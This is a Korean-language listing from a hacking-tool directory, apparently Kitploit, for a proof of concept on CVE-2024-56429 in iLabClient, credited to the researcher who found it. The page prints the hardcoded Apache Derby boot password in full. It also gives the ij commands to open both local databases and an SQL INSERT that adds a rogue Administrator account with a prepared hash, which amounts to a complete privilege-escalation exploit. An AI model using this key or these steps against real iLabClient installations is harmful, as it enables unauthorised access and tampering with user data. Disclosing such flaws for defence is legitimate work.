Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-56429 | Kitploit
도구/GitHubGitHub/lisa-2905/cve-2024-56429
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationDatabase Security
GitHublisa-2905/cve-2024-56429

CVE-2024-56429

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-56429

iLabClient의 로컬 데이터베이스에 대한 접근


데이터베이스 비밀번호 추출

iLabClient는 로컬에 필요한 데이터를 저장하기 위해 Apache Derby 데이터베이스를 사용합니다. 암호화를 보장하기 위해 생성 시 bootPassword가 사용되며, 이는 소스 코드에서 추출할 수 있습니다 (추출된 코드는 DecyptedBootPassword.java에 있습니다). 추출된 소스 코드를 실행하면 사용자는 bootPassword를 받게 됩니다.

root@kitploit:~
jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==

데이터베이스에 연결

iLabClient를 처음 시작하면 iLabCLient와 iLabDB라는 두 개의 로컬 데이터베이스가 생성됩니다. 이러한 데이터베이스에 연결하려면 Apache Derby의 ij 도구를 사용할 수 있습니다: 다운로드.

ij 시작:

root@kitploit:~
"C:\ilabClient\java8u422\bin\java.exe" -jar "...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" ij

"C:\ilabClient\java8u422\bin\java.exe": iLabClient에서 설치 및 사용하는 Java 버전
"...\db-derby-10.14.2.0-lib\lib\derbyrun.jar": Apache Derby 라이브러리

데이터베이스에 연결:

root@kitploit:~
cd "C:\ilabClient\db
connect 'jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
connect 'jdbc:derby:iLabDB;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';

데이터 조작 (예)

연결이 설정되면 데이터를 읽고 조작할 수 있습니다. 예를 들어, 더 많은 권한을 가진 다른 사용자를 추가하는 방식으로 말입니다.

root@kitploit:~
 insert into users (USERID, BENUTZER, NAME, PARAMS, HASH) values (4, 'admin2', 'Administrator', '111111111111111111', 'SHA-256:B6382EC801B1BBD5C464C6A5F9C8CFFDC603A7D3A4916B1F50BD592678E8380B');

필요한 해시는 GenerateUserData.java 클래스로 생성할 수 있습니다.


발견자: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)

도구 다운로드